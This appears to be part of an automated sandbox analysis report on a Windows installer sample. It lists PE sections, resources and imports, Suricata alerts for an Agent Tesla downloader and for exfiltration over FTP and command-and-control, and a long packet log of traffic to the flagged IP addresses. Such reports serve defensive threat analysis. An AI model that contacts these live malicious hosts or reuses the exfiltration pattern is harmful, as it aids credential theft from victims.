                                                    .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2a0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x540000x2d4900x2d6003469fad129cc4f5d98277ff568dc0969False0.603391873278237data6.111326163907691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x543580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.376375251390039
                                                    RT_ICON0x64b800xe444PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9933089191594223
                                                    RT_ICON0x72fc80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4520794824399261
                                                    RT_ICON0x784500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4557156353330184
                                                    RT_ICON0x7c6780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5064315352697095
                                                    RT_ICON0x7ec200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.551829268292683
                                                    RT_ICON0x7fcc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6086065573770492
                                                    RT_ICON0x806500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                    RT_DIALOG0x80ab80x100dataEnglishUnited States0.5234375
                                                    RT_DIALOG0x80bb80x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0x80cd80xc4dataEnglishUnited States0.5918367346938775
                                                    RT_DIALOG0x80da00x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0x80e000x76dataEnglishUnited States0.7542372881355932
                                                    RT_VERSION0x80e780x310dataEnglishUnited States0.4846938775510204
                                                    RT_MANIFEST0x811880x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                    DLLImport
                                                    KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                    ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                    ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-31T10:36:19.109989+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.94997445.43.14.13480TCP
                                                    2024-10-31T10:36:26.833874+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.949976203.161.184.3421TCP
                                                    2024-10-31T10:36:27.737298+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949977203.161.184.3450430TCP
                                                    2024-10-31T10:36:27.742987+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949977203.161.184.3450430TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 31, 2024 10:36:18.381017923 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:18.385864973 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:18.385987043 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:18.386198044 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:18.391021967 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109726906 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109756947 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109771013 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109786987 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109819889 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109833956 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.109988928 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.110085964 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.110089064 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.110106945 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.110121012 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.110131979 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.110171080 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.110232115 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.115099907 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.115144014 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.115156889 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.115293026 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.228426933 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.228486061 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.228499889 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.228523970 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.228559017 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.228626966 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.228682995 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.228684902 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.228698015 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.228728056 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.228749037 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.228959084 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.229034901 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.229048014 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.229054928 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.229089022 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.229106903 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.229201078 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.229213953 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.229254961 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.270112038 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.270147085 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.270160913 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.270179033 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.270215034 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.347394943 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347438097 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347450018 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347524881 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.347596884 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347599030 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.347610950 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347702026 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.347716093 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347781897 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.347841978 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347913027 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.347915888 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347929001 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.347992897 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.348059893 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.348118067 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.388792038 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.388818026 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.388830900 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.388911963 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.388984919 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.389122009 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466381073 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466423035 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466495037 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466509104 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466521025 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466556072 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466623068 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466670036 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466708899 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466747999 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466829062 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466840029 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466852903 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466865063 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.466876030 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466886044 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.466922998 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.509084940 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.509104967 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.509186983 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.509200096 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.509303093 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.509313107 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.509413004 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.584980011 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585046053 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585059881 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585124016 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585155010 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.585170031 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585256100 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.585283041 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585295916 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585306883 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585366011 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.585484028 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.585551023 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.627388954 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.627430916 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.627445936 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.627543926 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.627564907 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.627584934 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.627645016 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.627804995 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.627880096 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.703845024 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.703869104 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.703883886 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.703897953 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.703998089 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.704011917 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.704042912 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.704124928 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.704169035 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.704224110 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.704231024 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.704304934 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.745091915 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.745141029 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.745153904 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.745291948 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.746423006 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.746474981 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.746488094 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.746530056 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.746611118 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.746640921 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.746712923 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.746742964 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.746786118 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.746788025 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.746835947 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.822777033 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.822794914 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.822854042 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.822881937 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.822918892 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.822966099 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.822968960 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.822983027 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.823014021 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.823024035 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.823163986 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.823177099 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.823210001 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.823219061 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.823617935 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.823667049 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.863974094 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.863993883 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.864008904 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.864023924 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.864051104 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.865361929 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.865401983 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.865456104 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.865490913 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.865499973 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.865504980 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.865520000 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.865530014 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.865690947 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.865727901 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.905800104 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.905819893 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.905885935 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.941917896 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.941939116 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.941952944 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.941999912 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.942022085 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.942059994 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.942059994 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.942061901 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.942121029 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.942413092 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.942428112 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.942441940 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.942475080 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.942496061 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.983146906 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.983251095 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.983263016 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.983269930 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.983324051 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.983324051 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.984169006 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.984216928 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.984231949 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.984245062 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.984272957 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.984297991 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:19.984421015 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.984431982 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:19.984467030 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.060724974 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.060766935 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.060779095 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.060796976 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.060826063 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.060895920 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.060937881 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.061001062 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061014891 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061049938 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.061187983 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061199903 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061239958 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.061558008 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061604023 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.061631918 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061671019 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.061738014 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061757088 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.061779976 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.061794996 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.101787090 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.101814985 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.101828098 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.101902962 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.101943016 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.103319883 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.103362083 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.103369951 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.103375912 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.103401899 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.103416920 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.103533030 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.103545904 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.103579998 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.103593111 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.179441929 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179492950 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179505110 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179522991 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.179555893 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.179586887 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179626942 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.179814100 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179826975 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179902077 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.179918051 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.179965019 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.180197954 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.180253029 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.180272102 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.180285931 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.180311918 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.180330038 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.180403948 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.180478096 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.220655918 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.220721960 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.220732927 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.220746040 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.220772028 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.220778942 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.222038031 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.222089052 CET4997480192.168.2.945.43.14.134
                                                    Oct 31, 2024 10:36:20.222158909 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.222170115 CET804997445.43.14.134192.168.2.9
                                                    Oct 31, 2024 10:36:20.222203016 CET4997480192.168.2.945.43.14.134
